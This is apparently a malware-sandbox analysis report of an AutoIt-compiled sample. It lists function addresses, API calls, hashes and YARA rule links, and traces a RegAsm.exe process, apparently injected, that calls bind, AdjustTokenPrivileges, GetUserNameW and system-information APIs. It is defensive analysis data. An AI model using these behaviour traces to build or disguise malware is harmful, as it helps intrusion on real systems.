Similarity

API ID: From$Prog$ExceptionFreeRaiseStringTasklstrcmpi
String ID:
API String ID: 450394209-0
Opcode ID: bc25b6519a94f10dbb251a0eebce8836490a121c9ede26846711f318317bd882
Instruction ID: 7358ad2804b9dc9911c054a84f83c2ad3ef792169d9fc978e4c4218005fc1a73
Opcode Fuzzy Hash: bc25b6519a94f10dbb251a0eebce8836490a121c9ede26846711f318317bd882
Instruction Fuzzy Hash: 4B11E572604618BBDB105F69EC04B9E7BACEB04762F144439FD08D2212E779DE4487A8

Uniqueness

Uniqueness Score: -1.00%

Function 004654E6, Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0046555E

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 72de52679d9368bff63ea29de6d144572b9e7e287c6a07ba23d639df65210cf3
Instruction ID: 904bb0919bfdc2718e962a82bb6b112c9c46cd464800c0dd09bb372580e459e7
Opcode Fuzzy Hash: 72de52679d9368bff63ea29de6d144572b9e7e287c6a07ba23d639df65210cf3
Instruction Fuzzy Hash: 1A016131D00A19EBCF00DFE8E84D6EDBB78FB09711F04046AE502F2154EB345954C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 004013B0, Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 004013BF
StrokeAndFillPath.GDI32(?,?,0043BAD8,00000000,?), ref: 004013DB
SelectObject.GDI32(?,00000000), ref: 004013EE
DeleteObject.GDI32 ref: 00401401
StrokePath.GDI32(?), ref: 0040141C

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 5136afe5d618e3a9de46e0e1d94be4e4fa01b3eec21db16889133373e34d653e
Instruction ID: f812cb0b4e4429ed7f7e618ed03f07a0aa621b4c15f073e4694ef7f498b4602e
Opcode Fuzzy Hash: 5136afe5d618e3a9de46e0e1d94be4e4fa01b3eec21db16889133373e34d653e
Instruction Fuzzy Hash: 67F01930001208EFDB516F26EC4CB593BA4AB41326F15C639E829941F1C7358999DF28

Uniqueness

Uniqueness Score: -1.00%

Function 004162F2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004163A8
_memmove.LIBCMT ref: 00416446
_memset.LIBCMT ref: 0041646A

Strings

ERCP, xrefs: 00416313

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 25dc1189b28c8648ea83cdad9136b95fe85d6ab8f80ab522c9aa2e22ef6a070d
Instruction ID: 5033df5f12e9d93d71518abbe4fce8200a660ff7c3ad8cb2f73575c85904d8e6
Opcode Fuzzy Hash: 25dc1189b28c8648ea83cdad9136b95fe85d6ab8f80ab522c9aa2e22ef6a070d
Instruction Fuzzy Hash: 9551C0719007199BCB24CF65C881BEBBBF4EF08314F20856FE94AC6251E778D985CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00473CDD, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00473D5A

Part of subcall function 00407F41: _memmove.LIBCMT ref: 00407F82

Strings

AUTOITCALLVARIABLE%d, xrefs: 00473D4C
%I, xrefs: 00473CE8
, $, xrefs: 00473D9A

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d$%I
API String ID: 3506404897-3751216540
Opcode ID: a754a41876dd94756e1bb8f527dba9e2004a961ab8cb04c23dc0f2ccbd1fb6b7
Instruction ID: 991e62ca2d85527952959e0cb6d74c1b8c3b79d2a13ecd2fa9961f4cfe28b1de
Opcode Fuzzy Hash: a754a41876dd94756e1bb8f527dba9e2004a961ab8cb04c23dc0f2ccbd1fb6b7
Instruction Fuzzy Hash: DE218671600219AACF10EF65CC81AED7764BF44704F5044AFF409A7281D738EE55DBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004576C5, Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
Instruction ID: 5f60346f4440b9fe6298feee7a8cd4ef23557f5833b865c9cfb6b317c071e1ce
Opcode Fuzzy Hash: b67f0641d69e682f3dbeb5e9524b3f3136514ebd375aeb5d2f23f0fb20905a0f
Instruction Fuzzy Hash: 35C19E74A04216EFDB14CF94D884EAEB7B5FF48311B1085AAE805EB352D734ED85CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00456DF3, Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00456E04
SysAllocString.OLEAUT32(00000000), ref: 00456EAD
VariantCopy.OLEAUT32 ref: 00456EDC
VariantClear.OLEAUT32(?), ref: 00456F03

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 0ce90a19c1053be24f17d093c2b89b6449077026b4906e45b20bc662710397b6
Instruction ID: 493451d42fa2cf72034c46684ab61465e33aa78788b401b925ba93198380c5c1
Opcode Fuzzy Hash: 0ce90a19c1053be24f17d093c2b89b6449077026b4906e45b20bc662710397b6
Instruction Fuzzy Hash: EB510D316047019BDB209F66E881A2EB3E59F48715F60883FED46C72D3DB789849DB0D

Uniqueness

Uniqueness Score: -1.00%

Function 0048ADF1, Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0048AE1A
GetWindowRect.USER32(?,?), ref: 0048AE90
PtInRect.USER32(?,?,0048C304), ref: 0048AEA0
MessageBeep.USER32(00000000), ref: 0048AF11

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 6a18ba18eb21849e9a78bd79b6f84d7a3cce87d2be61423b7a6c01e025f158a7
Instruction ID: 20aafe120d683b7536ec1c361d9cbfa3becb7b0e8fd9f7a68ee45a873ef900b5
Opcode Fuzzy Hash: 6a18ba18eb21849e9a78bd79b6f84d7a3cce87d2be61423b7a6c01e025f158a7
Instruction Fuzzy Hash: 72419A70A001099FEB11EF58C884A6D7BF1FF48340F1889BBEA049B351D7B4A812DF5A

Uniqueness

Uniqueness Score: -1.00%

Function 00436415, Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043644B
__isleadbyte_l.LIBCMT ref: 00436479
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004364A7
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 004364DD

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: f95d2081635511957ee21cbff85720af553d1923269aba5ee5c8224bed042a40
Instruction ID: 00bfbab79281597f36fe53e4f64e7450777474697505dafcb940073344e51601
Opcode Fuzzy Hash: f95d2081635511957ee21cbff85720af553d1923269aba5ee5c8224bed042a40
Instruction Fuzzy Hash: 4A31F030A00257BFDB218F65CC44BAB7BA9FF59310F16802AE8548B290D738E850DB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0048C788, Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

GetCursorPos.USER32(?), ref: 0048C7C2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043BBFB,?,?,?,?,?), ref: 0048C7D7
GetCursorPos.USER32(?), ref: 0048C824
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043BBFB,?,?,?), ref: 0048C85E

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: a85a76047272f662d32a6246e5787e1bd68dff5fdec9e985923bd53b80d21c5b
Instruction ID: 757619bd3f98b372d46f3818d8faf94b3fa09ae1c323e5c89f059bb0ed552e39
Opcode Fuzzy Hash: a85a76047272f662d32a6246e5787e1bd68dff5fdec9e985923bd53b80d21c5b
Instruction Fuzzy Hash: 00318F35600018AFCB15EF58C898EEF7BB6EB49311F04486AF9058B2A1C7359950DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00401290, Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,00000020,?), ref: 004012D8
GetClientRect.USER32(?,?), ref: 0043B84B
GetCursorPos.USER32(?), ref: 0043B855
ScreenToClient.USER32(?,?), ref: 0043B860

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: e3d8f111a3b58b1aa3485ec631a693ca2f30f6b47763b5dceb9f2c7f206f7e47
Instruction ID: 88478fa3ad29557ab13713681797212a94603c3b61ccda0d63648654153e7648
Opcode Fuzzy Hash: e3d8f111a3b58b1aa3485ec631a693ca2f30f6b47763b5dceb9f2c7f206f7e47
Instruction Fuzzy Hash: 82112B39510019EBCB00EF94D8859AE77B8FB05300F1048AAF901F7291D734AA569BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401D35, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00401D73
GetStockObject.GDI32(00000011), ref: 00401D87
SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 6ef78ac23a4bd727a3300ca9299958f8ec95875dc6640e3e56f2f55486011c29
Instruction ID: bcc18056a9f9bf7612c1f1802b6de8f9928d6a82d4ed00d2f4876380ead3997e
Opcode Fuzzy Hash: 6ef78ac23a4bd727a3300ca9299958f8ec95875dc6640e3e56f2f55486011c29
Instruction Fuzzy Hash: 0D11A172501108BFEF018F90DC44EEB7B69FF48354F440126FA0462160C739EC60DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0048B8EF, Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0048B8FE
_memset.LIBCMT ref: 0048B90D
CreateProcessW.KERNEL32 ref: 0048B93C
CloseHandle.KERNEL32 ref: 0048B94E

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: aef966b7f9c6a9e5f3feef3a5550379141bbff02af3ee6c922963a207ea2d008
Instruction ID: 82d0d7306074909859a51e75144c9fe9cb012601897826516f2148835353e407
Opcode Fuzzy Hash: aef966b7f9c6a9e5f3feef3a5550379141bbff02af3ee6c922963a207ea2d008
Instruction Fuzzy Hash: DDF05EB26443107BE2506B61AC85FBB3A5CEB08358F00443AFB08D5296D77959008BBC

Uniqueness

Uniqueness Score: -1.00%

Function 0048C00C, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 004012F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
Part of subcall function 004012F3: SelectObject.GDI32(?,00000000), ref: 0040135C
Part of subcall function 004012F3: BeginPath.GDI32(?), ref: 00401373
Part of subcall function 004012F3: SelectObject.GDI32(?,00000000), ref: 0040139C

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0048C030
LineTo.GDI32(00000000,?,?), ref: 0048C03D
EndPath.GDI32(00000000), ref: 0048C04D
StrokePath.GDI32(00000000), ref: 0048C05B

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: edfbcd623de5c465fbf958c9dabb36f9443974b16c1799f8a50be9d4dd4f4236
Instruction ID: 674b4468024ad211d301666b20e3bfa7de505a3549e2e29f62cfbf593809ea28
Opcode Fuzzy Hash: edfbcd623de5c465fbf958c9dabb36f9443974b16c1799f8a50be9d4dd4f4236
Instruction Fuzzy Hash: BAF0BE31001219BBDB127F90AC09FCE3F58AF06310F148429FA11210E287794564DBAD

Uniqueness

Uniqueness Score: -1.00%

Function 004063A0, Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%I, xrefs: 004063AE

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: %I
API String ID: 0-63094095
Opcode ID: 7caedb9f9cf2232352b7d5c2cb27a80320a09215eca3e867784c8f64b05a9689
Instruction ID: 84bc00bdb2e4020951578f3af3c94fec4ee35539559d4017637e04890254edec
Opcode Fuzzy Hash: 7caedb9f9cf2232352b7d5c2cb27a80320a09215eca3e867784c8f64b05a9689
Instruction Fuzzy Hash: 25B18F71900109AACF14EB99C8819EEB7B4EF44314F51403BE903B72D5DA3C9D96CB5E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 4936 Parent PID: 4904 RegAsm.exeCOMMON

Executed Functions

Function 0543AD38, Relevance: 2.2, Strings: 1, Instructions: 911COMMON

Download Yara Rule

Strings

r, xrefs: 0543B7EC

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 6f01a6c8bddcbf7bbdedc6094fa58fb269194ea92f23e3292a89618061b66c35
Instruction ID: 190c0ba67e27990cfcf7d465df6a91d7ff49b18e2ed9ffb002def44f742174af
Opcode Fuzzy Hash: 6f01a6c8bddcbf7bbdedc6094fa58fb269194ea92f23e3292a89618061b66c35
Instruction Fuzzy Hash: 72821670A00619DFCB14CF69C585AAEBBB2FF88310F15C56AD45AAB761D730E981CF90

Uniqueness

Uniqueness Score: -1.00%

Function 05562428, Relevance: 1.6, APIs: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E90,842A7EE1,00000000,00000000,00000000,00000000), ref: 055624DB

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: bbc5156e16b02aa30ab5b468f291e41b89dc9dd2879275bc31881757b6ef8385
Instruction ID: d3d874fa64d8864bcd10eb6b9e88267072bba21fac4f99efb466c7b5bb2b224b
Opcode Fuzzy Hash: bbc5156e16b02aa30ab5b468f291e41b89dc9dd2879275bc31881757b6ef8385
Instruction Fuzzy Hash: 1431697540E3C0AFD7128B219C54B56BFB8AF07214F0984DBE984DF1A3D269A949CB72

Uniqueness

Uniqueness Score: -1.00%

Function 05560EF3, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05560F73

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 3ee4553c994c765c31d607672ad9b57c731c1a0540eafd368da2cf6e2f4ff8ff
Instruction ID: 0194f4c24cf2ac64645f748fab62053fe475091ec3bb33b4b47f7a450f1becab
Opcode Fuzzy Hash: 3ee4553c994c765c31d607672ad9b57c731c1a0540eafd368da2cf6e2f4ff8ff
Instruction Fuzzy Hash: 99219F765097C4AFDB238F25DC44B52FFB4BF06310F0884DAE9858B5A3D2759908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0556112F, Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 055611A5

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: ffbb11c284308b8aca9e7ab1aa748aad1dceb44399e4e9f06dba4524ea5ba5ba
Instruction ID: f1347ab352964a5c60c20e54277471514d80b7254d611fc31814608c784483bc
Opcode Fuzzy Hash: ffbb11c284308b8aca9e7ab1aa748aad1dceb44399e4e9f06dba4524ea5ba5ba
Instruction Fuzzy Hash: 0D219D714097C0AFDB238B21DC51A62FFB0EF16314F0984DBE9844B163D265A909DB62

Uniqueness

Uniqueness Score: -1.00%

Function 0556247A, Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

bind.WS2_32(?,00000E90,842A7EE1,00000000,00000000,00000000,00000000), ref: 055624DB

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: bind
String ID:
API String ID: 1187836755-0
Opcode ID: c2af0061f5f0788636f60e5bbc96601b61358e7231c37682641f518c656b6b39
Instruction ID: 04719d4eaf122554baf0c463460012cda725bdc09b8c58b9ac4deee1cea11014
Opcode Fuzzy Hash: c2af0061f5f0788636f60e5bbc96601b61358e7231c37682641f518c656b6b39
Instruction Fuzzy Hash: 96119D75504244AFEB20CF55DC84FA6BBA8EF44320F1484ABEE099F241D674A504CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 05560F2A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 05560F73

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: d16bd8f6987782574ff4efb8362cee6b2faf71ee3485155fc687c2b0c0d1a6ec
Instruction ID: 4d4472ce0d41a29653b6f619cfe62b905f8d67bed605cedc6e535ca1f3e94134
Opcode Fuzzy Hash: d16bd8f6987782574ff4efb8362cee6b2faf71ee3485155fc687c2b0c0d1a6ec
Instruction Fuzzy Hash: 3D119E315006409FDB21CF55D888B66FBE4FF04320F0884AAED4A8B661D375E558CF61

Uniqueness

Uniqueness Score: -1.00%

Function 02C1AF9A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,00000E90,?,?), ref: 02C1AFEA

Memory Dump Source

Source File: 0000000D.00000002.612573870.0000000002C1A000.00000040.00000001.sdmp, Offset: 02C1A000, based on PE: false

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 76873623e418e847f11e8160a387b797c0a53c8c6a41de2b554db76c83f3416f
Instruction ID: 66dfac646a857dd8755f7fe251d6e218b48e380181cc6bd34790d22fd3ebd170
Opcode Fuzzy Hash: 76873623e418e847f11e8160a387b797c0a53c8c6a41de2b554db76c83f3416f
Instruction Fuzzy Hash: 83016D76500600ABD710DF16DC86F26FBA8FBC8B20F14815AED085B741E375F956CAE6

Uniqueness

Uniqueness Score: -1.00%

Function 05560BB6, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?), ref: 05560BE8

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 22b77ff0c2af1176dc1f108f9d26b1d78821b0681e58d99857627a1e54b6cf8a
Instruction ID: 57e15a94f4ba04db316423719320cf39467bdf6757d95383266efdce9659c405
Opcode Fuzzy Hash: 22b77ff0c2af1176dc1f108f9d26b1d78821b0681e58d99857627a1e54b6cf8a
Instruction Fuzzy Hash: 28016271404244DFEB10CF15D989766FFD4EF44320F18C4AADD499F256D2B5A448CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0556116A, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 055611A5

Memory Dump Source

Source File: 0000000D.00000002.616551606.0000000005560000.00000040.00000001.sdmp, Offset: 05560000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: f9ab747f1dfc9dd7d0c44829905c7887f4c2f056bdf3617b1a1e1f9d187395c7
Instruction ID: 55a23a087cb3a36d31eed905650c995d134c25ac87d7347ec4046d73b93b3382
Opcode Fuzzy Hash: f9ab747f1dfc9dd7d0c44829905c7887f4c2f056bdf3617b1a1e1f9d187395c7
Instruction Fuzzy Hash: A7018B35500A80EFDB20CF45D884B76FFA1FF44320F08C89ADE490B612D2B6A458CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 05438468, Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d359c495a56025a1d591e4dd158977f872ca2d32e6d97f336fd723ef06092084
Instruction ID: 2cadd2ab9dcecfca775b364616e0e5db4195222514401d45305772be08e152d5
Opcode Fuzzy Hash: d359c495a56025a1d591e4dd158977f872ca2d32e6d97f336fd723ef06092084
Instruction Fuzzy Hash: F8129D70E02219CFDB14CF69D49A6AEFBF2FF88310F54856AE0169B361DB749942CB50

Uniqueness

Uniqueness Score: -1.00%

Function 054323A0, Relevance: .5, Instructions: 505COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.616137470.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00b24485fcbd698e00256aa85a7cba14b4f3d39b05a60f203574835c85373cf4
